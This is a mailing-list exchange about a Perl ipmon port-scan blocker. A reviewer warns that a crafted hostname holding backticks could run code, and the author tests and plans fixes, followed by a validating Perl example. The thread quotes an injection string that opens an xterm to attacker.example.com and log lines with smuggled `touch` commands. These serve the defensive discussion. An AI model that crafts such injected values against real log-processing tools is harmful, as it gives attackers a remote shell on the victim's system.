Hi Jefferson,

Thank you for your reply, and an interesting point.

I verified that an entry with backticks in the ipmon log file doesn't execute by echoing a line:

    17/06/2005 09:16:42.519563 fxp0 @0:48 b 81.`touch /hi`.120.46,1364 -> 216.34.`touch /bye`.168,139 PR tcp len 20 48 -S 2163595220 0 65535 IN

Just to make sure, I'll include the -T switch with the interpreter, and add a line:

    $line_orig =~ s/\`//g;

just after it reads in the line. Also, there should be support for hostname resolution or IP addresses, rather than just IP addresses. I'll add that in.

Sentrytools is an interesting project. The concept of the MOAN project is to provide a small base Perl script, rather than C, for people who want a port scan detection function, or to be able to easily branch off and write functions for other network events using Perl.

Again, thank you for your input.

Regards,
Dan Sopher

--- Jefferson Ogata <[EMAIL PROTECTED]> wrote:

> Dan S wrote:
> > Hi. I'm not sure if my last email went through correctly, so please
> > excuse this if it's a repost. I uploaded a Perl script that works with
> > ipmon and log rules. It detects port scans, and enters the IP address
> > into the rules file, and dynamically blocks the host. If you are
> > interested, the script is on sourceforge at:
>
> You might want to consider what happens if someone has hostname
> resolution enabled in ipmon, starts running this script (admittedly it
> won't work well if ipmon is logging hostnames, but someone might not
> realize that), and an attacker performs a portscan from an IP that
> resolves to, say, 123."`xterm -display attacker.example.com:0.0`".example.com...
>
> You also might want to have a look at portsentry if you're not familiar
> with it.
>
> http://sourceforge.net/projects/sentrytools/
>
> --
> Jefferson Ogata <[EMAIL PROTECTED]>
> NOAA Computer Incident Response Team (N-CIRT) <[EMAIL PROTECTED]>
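Added example (my own code, not the MOAN script and not anything posted in the thread): the exchange above is about ipmon log fields reaching a shell. Instead of stripping backticks, which leaves $(...), semicolons and hostnames untouched, the script can accept a source field only when it matches a strict dotted-quad pattern and reject every other line; the ipf rule syntax and the sample log lines are assumptions constructed for the example.

```perl
#!/usr/bin/perl -T
# Added example, not the MOAN script: take the source address out of an ipmon
# log line only when it is a plain dotted quad, and build the block rule from
# that validated value alone. A hostname, backticks, $(...) or a semicolon in
# the field makes the line fail validation instead of being "cleaned".
use strict;
use warnings;

# Constructed sample lines. The second is the backtick test from the thread.
my @samples = (
    '17/06/2005 09:16:42.519563 fxp0 @0:48 b 81.2.120.46,1364 -> 216.34.10.168,139 PR tcp len 20 48 -S 2163595220 0 65535 IN',
    '17/06/2005 09:16:42.519563 fxp0 @0:48 b 81.`touch /hi`.120.46,1364 -> 216.34.`touch /bye`.168,139 PR tcp len 20 48 -S 2163595220 0 65535 IN',
    '17/06/2005 09:16:43.000000 fxp0 @0:48 b scanner.example.com,1365 -> 216.34.10.168,139 PR tcp len 20 48 -S 1 0 65535 IN',
);

# Return the source IPv4 address of an ipmon line, or undef when the source
# field is not a dotted quad. Under -T the capture group is what untaints the
# value, so the pattern stays tight: digits and dots only, anchored to the
# fixed fields before it (date, time, interface, @group:rule, b/p action).
sub source_ip {
    my ($line) = @_;
    return undef unless $line =~ /^\S+\s+\S+\s+\S+\s+\@\S+\s+[bp]\s+((?:\d{1,3}\.){3}\d{1,3}),\d{1,5}\s+->\s+/;
    my $ip = $1;
    return undef if grep { $_ > 255 } split /\./, $ip;   # 999.1.1.1 is not an address
    return $ip;
}

# ipf rule text for the rules file (ipf syntax is an assumption here); it is
# only ever built from a value that passed source_ip().
sub rule_for {
    my ($ip) = @_;
    return "block in quick from $ip to any";
}

for my $line (@samples) {
    my $ip = source_ip($line);
    if (defined $ip) {
        print "add rule: ", rule_for($ip), "\n";
    } else {
        print "rejected, no clean source address in: $line\n";
    }
}
```

Run it directly or as `perl -T script.pl` (taint mode must be on from the start); only the first sample yields a rule, the backtick line and the hostname line are rejected.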
